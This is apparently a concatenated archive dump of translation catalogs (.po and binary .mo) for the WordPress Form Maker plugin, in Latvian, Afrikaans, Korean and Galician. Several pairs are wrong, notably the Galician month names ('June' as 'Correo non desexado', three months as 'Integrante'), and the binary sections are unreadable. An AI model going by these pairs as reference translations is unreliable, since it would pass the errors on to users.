#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "lauks ir obligāts."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Tas nav derīga e-pasta adresi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Jūs nevarat izvēlēties bijušo datumus. Izvēlieties datumu, sākot no "
"pašreizējā viena."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "vērtība ir starp "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Daudzumu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Tavs rezultāts ir mazāks nekā "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Kā J;us uzrunāt"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Pirmais"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Pēdējais"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Vidus"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Platība kods"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Tālruņa numurs"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dolāru"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Centiem"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "No"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Līdz"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "go "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "reset "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Izvēlieties lauks "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Izvēlieties Date"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-af.mo000060400000007134152434416630011566 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
	G
Q
Z
`
e
j
s
|
*�
 �
	�
�
�
�

#'.ENVew�
�
�	�E�� 3-8Pf"����N
$S
#x
$�
�
A�
 9H4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:48+0400
PO-Revision-Date: 2015-05-22 16:49+0400
Last-Translator: 
Language-Team: 
Language: af
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
aprilArea Kodeaugustussent stadlanddesemberdollars Fout, e-pos is nie gestuur nie.Fout, kan die lêer nie verskuif word nie.Fout, verkeerde veiligheid kode.februarieeersteVan GOjanuariejuliejunielaastemaartmeimiddelNiks is voorgelê nie.novemberoktoberTelefoonnommerPoskode / zipcodeHoeveelheid herstel Kies 'n datumKies 'n Veld septemberJammer, jy is nie toegelaat om hierdie tipe van die lêer op te laai.Staat / provinsie / streekStraatadresStraatadres Line 2die Die lêer oorskry die toelaatbare grootte vanHierdie veld %s vereis 'n unieke inskrywing en hierdie waarde is reeds ingedien.Dit is nie 'n geldige e-pos adres.titelTocVerifikasie skakel is ongeldig.Jy kan nie die voormalige datums te kies. Kies 'n datum vanaf die huidige een.Jou e-posadres is reeds geverifieer.Jou e-pos is suksesvol geverifieer.Jou e-pos verifiëring het uitgetel.Jou vorm is gestuur.Your ip is blacklisted. Please contact the website administrator.Jou telling moet minder wees as veld is nodig.waarde moet tussen languages/form_maker-ko_KR.mo000060400000007503152434416630012205 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A

F
T
Y
`
d
k
q
2x
/�
)�


$).	3=BG*Ny
���
�
���M�/AI\!`S�5�

'
r?
2�
3�
10K[|-�!!4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:00+0400
PO-Revision-Date: 2015-05-22 17:00+0400
Last-Translator: 
Language-Team: 
Language: ko
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
4월지역 코드8월센트시국가12월달러오류, 이메일이 전송되지 않았습니다.오류는 파일은 이동할 수 없습니다.오류, 잘못된 보안 코드입니다.2월첫 번째에서이동 1월7월6월마지막3월5월중간아무것도 제출되지 않았습니다.11월10월전화 번호우편 / 우편 번호수량재설정 날짜 선택필드를 선택 9월죄송합니다, 당신은이 파일 형식을 업로드할 수 없습니다.주 /도 / 지역번지:주소 입력란 2The파일의 허용 크기를 초과이 필드 %s 고유 항목을 필요하며이 값은 이미 제출되었습니다.이것은 유효한 이메일 주소가 아닙니다.제목에확인 링크가 잘못되었습니다.당신은 이전 날짜를 선택할 수 없습니다. 현재 하나에서 시작하는 날짜를 선택합니다.귀하의 이메일 주소는 이미 검증된다.이메일이 성공적으로 확인되었습니다.이메일 확인 시간이 초과되었습니다.양식이 성공적으로 제출되었습니다.당신의 IP가 블랙리스트됩니다. 웹 사이트 관리자에게 문의하십시오.당신의 점수는보다 작아야합니다 필드가 필요합니다.값 사이에 있어야합니다 languages/form_maker-gl_ES.po000060400000057123152434416630012177 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:55+0400\n"
"PO-Revision-Date: 2015-05-22 16:56+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: gl\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Rúa"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Rúa Liña de enderezo 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Cidade"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Estado / Provincia / Rexión"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postal / Zip Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Country"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Xaneiro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Febreiro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Buscar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Abril"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Luns"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Correo non desexado"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Jullo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Agosto"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Integrante"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Outros"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Integrante"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Integrante"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "De erro, código de seguridade mal."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"O seu IP está na lista negra. Por favor, póñase en contacto co administrador "
"do sitio."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "O arquivo excede o tamaño permitido de"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Sentímolo, non ten permiso para enviar este tipo de ficheiro."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "De erro, o ficheiro non pode ser movido."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Este campo %s require unha entrada única e este valor xa ten presentado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Erro, de correo-e non foi enviado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Nada foi presentado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "O seu formulario foi sometido con éxito."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Erro, de correo-e non foi enviado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "O seu enderezo de correo-e xa foi comprobado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "O seu correo electrónico foi verificada con éxito."

